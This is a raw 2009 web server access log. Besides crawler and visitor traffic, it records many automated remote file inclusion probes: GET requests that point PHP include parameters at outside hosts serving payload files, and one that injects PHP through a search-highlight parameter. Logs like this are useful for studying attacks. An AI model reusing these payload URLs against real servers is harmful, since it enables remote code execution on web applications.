72.30.142.126 - - [12/May/2009:02:51:13 -0400] "GET /logs/error_log.Q108010400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/May/2009:02:52:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.142.126 - - [12/May/2009:02:52:33 -0400] "GET /logs/access_log.Q107080600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.72.114 - - [12/May/2009:02:53:15 -0400] "GET /images/items/store_assess_section_over.jpg HTTP/1.1" 200 9043 "-" "Googlebot-Image/1.0"
208.64.202.135 - - [12/May/2009:02:53:25 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
208.64.202.135 - - [12/May/2009:02:53:25 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
208.64.202.135 - - [12/May/2009:02:53:34 -0400] "GET /logs/access_log.Q109011800%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:02:54:20 -0400] "GET /logs/error_log.Q108060300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.115.136.12 - - [12/May/2009:02:54:26 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.115.136.12 - - [12/May/2009:02:54:27 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.115.136.12 - - [12/May/2009:02:54:27 -0400] "GET /logs/access_log.Q109011800//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
193.34.167.192 - - [12/May/2009:02:54:33 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
66.232.102.70 - - [12/May/2009:02:55:26 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.64.202.135 - - [12/May/2009:02:57:22 -0400] "GET /logs/access_log.Q109011800//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:02:57:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.19.228.18 - - [12/May/2009:02:57:43 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.19.228.18 - - [12/May/2009:02:57:43 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.19.228.18 - - [12/May/2009:02:57:43 -0400] "GET /logs/access_log.Q109012300%20%20///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.228.18 - - [12/May/2009:02:57:48 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.19.228.18 - - [12/May/2009:02:57:48 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.19.228.18 - - [12/May/2009:02:57:48 -0400] "GET /logs/access_log.Q109012300%20%20///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.228.18 - - [12/May/2009:02:58:01 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.19.228.18 - - [12/May/2009:02:58:01 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.19.228.18 - - [12/May/2009:02:58:10 -0400] "GET /logs/access_log.Q109012300%20%20///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
220.246.85.26 - - [12/May/2009:02:58:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
220.246.85.26 - - [12/May/2009:02:58:27 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
220.246.85.26 - - [12/May/2009:02:58:31 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
220.246.85.26 - - [12/May/2009:02:58:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
211.115.89.68 - - [12/May/2009:02:58:35 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.115.89.68 - - [12/May/2009:02:58:35 -0400] "GET /logs/access_log.Q108101700//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
211.115.89.68 - - [12/May/2009:02:58:35 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.115.89.68 - - [12/May/2009:02:58:35 -0400] "GET /logs/access_log.Q109050300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
211.115.89.68 - - [12/May/2009:02:58:35 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.115.89.68 - - [12/May/2009:02:58:35 -0400] "GET /logs/access_log.Q109050300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
211.115.89.68 - - [12/May/2009:02:58:35 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.115.89.68 - - [12/May/2009:02:58:54 -0400] "GET /logs/access_log.Q108101700//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.249.72.114 - - [12/May/2009:02:59:48 -0400] "GET /logs/error_log.Q107100900 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.34.167.192 - - [12/May/2009:02:59:49 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
72.30.142.126 - - [12/May/2009:03:01:09 -0400] "GET /logs/error_log.Q108081200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.115.89.68 - - [12/May/2009:03:01:22 -0400] "GET /logs/error_log.Q108100300%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.115.89.68 - - [12/May/2009:03:02:08 -0400] "GET /logs/error_log.Q109050300%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
83.12.197.20 - - [12/May/2009:03:02:44 -0400] "GET ///program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/pw.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
218.168.76.21 - - [12/May/2009:03:02:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.168.76.21 - - [12/May/2009:03:02:47 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.168.76.21 - - [12/May/2009:03:02:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.168.76.21 - - [12/May/2009:03:02:52 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.30.142.126 - - [12/May/2009:03:02:53 -0400] "GET /logs/access_log.Q107081600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/May/2009:03:03:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.64.38 - - [12/May/2009:03:03:05 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.12.197.20 - - [12/May/2009:03:03:16 -0400] "GET /logs/access_log.Q108122500///program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/pw.txt???? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
83.12.197.20 - - [12/May/2009:03:03:16 -0400] "GET ///program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/pw.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
83.12.197.20 - - [12/May/2009:03:03:17 -0400] "GET /logs///program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/pw.txt???? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
74.53.70.114 - - [12/May/2009:03:03:19 -0400] "GET /logs/access_log.Q108080600//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.53.70.114 - - [12/May/2009:03:03:20 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.53.70.114 - - [12/May/2009:03:03:20 -0400] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
83.12.197.20 - - [12/May/2009:03:04:10 -0400] "GET /logs/access_log.Q108090400///program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/pw.txt???? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
74.53.70.114 - - [12/May/2009:03:04:11 -0400] "GET /logs/access_log.Q108090400//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
77.221.151.178 - - [12/May/2009:03:04:25 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.221.151.178 - - [12/May/2009:03:04:25 -0400] "GET /logs/access_log.Q109012900%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
77.221.151.178 - - [12/May/2009:03:04:25 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
77.221.151.178 - - [12/May/2009:03:04:25 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.221.151.178 - - [12/May/2009:03:04:25 -0400] "GET /logs/access_log.Q109012900%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
77.221.151.178 - - [12/May/2009:03:04:25 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
77.221.151.178 - - [12/May/2009:03:04:26 -0400] "GET /logs/access_log.Q109040200%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
77.221.151.178 - - [12/May/2009:03:04:26 -0400] "GET /logs/access_log.Q109040200%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.128.135.52 - - [12/May/2009:03:04:39 -0400] "GET /index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/May/2009:03:04:39 -0400] "GET /logs/access_log.Q109050700/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/May/2009:03:04:39 -0400] "GET /logs/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/May/2009:03:04:42 -0400] "GET /logs/error_log.Q109050400/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
77.221.151.178 - - [12/May/2009:03:05:16 -0400] "GET /logs/access_log.Q109012900//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.221.151.178 - - [12/May/2009:03:05:16 -0400] "GET /logs/access_log.Q109040200//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.221.151.178 - - [12/May/2009:03:05:16 -0400] "GET /logs/access_log.Q109012900//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.221.151.178 - - [12/May/2009:03:05:17 -0400] "GET /logs/access_log.Q109040200//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.115.89.68 - - [12/May/2009:03:05:18 -0400] "GET /logs/access_log.Q108112300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:03:05:38 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:03:05:38 -0400] "GET /logs/access_log.Q108092700%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:03:05:38 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:03:05:45 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:03:05:45 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:03:05:45 -0400] "GET /logs/access_log.Q108092700%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.53.70.114 - - [12/May/2009:03:06:14 -0400] "GET /logs/access_log.Q108080600%20%20//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:03:06:14 -0400] "GET /logs/access_log.Q108100900%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:03:06:16 -0400] "GET /logs/access_log.Q108100900%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.53.70.114 - - [12/May/2009:03:06:36 -0400] "GET /logs/access_log.Q108090400%20%20//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.115.89.68 - - [12/May/2009:03:06:45 -0400] "GET /logs/access_log.Q108112300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.206.45.1 - - [12/May/2009:03:07:36 -0400] "GET /logs/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
83.206.45.1 - - [12/May/2009:03:07:36 -0400] "GET /logs/error_log.Q109050400/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
83.206.45.1 - - [12/May/2009:03:07:36 -0400] "GET /index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
209.59.12.99 - - [12/May/2009:03:08:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.55.164.230 - - [12/May/2009:03:08:07 -0400] "GET /logs/access_log.Q108122500//sohoadmin//program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.820"
72.55.164.230 - - [12/May/2009:03:08:07 -0400] "GET //sohoadmin//program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.820"
72.55.164.230 - - [12/May/2009:03:08:07 -0400] "GET /logs//sohoadmin//program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.820"
72.55.164.230 - - [12/May/2009:03:08:36 -0400] "GET /logs/access_log.Q108090400//sohoadmin//program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.820"
83.206.45.1 - - [12/May/2009:03:09:28 -0400] "GET /logs/access_log.Q108091800/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 282 "-" "libwww-perl/5.803"
86.122.170.50 - - [12/May/2009:03:10:24 -0400] "GET /logs/access_log.Q108081300//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
86.122.170.50 - - [12/May/2009:03:10:24 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
86.122.170.50 - - [12/May/2009:03:10:24 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
208.64.202.135 - - [12/May/2009:03:10:28 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
208.64.202.135 - - [12/May/2009:03:10:28 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
208.64.202.135 - - [12/May/2009:03:10:28 -0400] "GET /logs/access_log.Q108100700//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
208.64.202.135 - - [12/May/2009:03:10:30 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
208.64.202.135 - - [12/May/2009:03:10:30 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
208.64.202.135 - - [12/May/2009:03:10:30 -0400] "GET /logs/access_log.Q108100700//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
208.64.202.135 - - [12/May/2009:03:10:32 -0400] "GET /logs/access_log.Q108112400//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
208.64.202.135 - - [12/May/2009:03:10:34 -0400] "GET /logs/access_log.Q108112400//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:03:10:45 -0400] "GET /logs/access_log.Q109042500/index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:03:10:46 -0400] "GET /index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:03:10:46 -0400] "GET /logs/index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.825"
66.249.72.114 - - [12/May/2009:03:10:53 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L002981419F2006008C3C091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.172.126.16 - - [12/May/2009:03:10:54 -0400] "GET /logs/access_log.Q109042500/index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:03:10:54 -0400] "GET /index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:03:10:54 -0400] "GET /logs/index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
66.249.72.114 - - [12/May/2009:03:11:05 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [12/May/2009:03:11:05 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L002981419EA096008C3C091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
86.122.170.50 - - [12/May/2009:03:11:06 -0400] "GET /logs/access_log.Q108091400//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
66.249.72.114 - - [12/May/2009:03:11:15 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L002981419F009600813C091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [12/May/2009:03:11:24 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L002981419ED016008C3C091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
147.27.14.31 - - [12/May/2009:03:11:25 -0400] "GET /logs/access_log.Q109042500/index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
147.27.14.31 - - [12/May/2009:03:11:25 -0400] "GET /index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
88.191.103.144 - - [12/May/2009:03:11:26 -0400] "GET /logs/access_log.Q109031600/index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
147.27.14.31 - - [12/May/2009:03:11:26 -0400] "GET /logs/index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
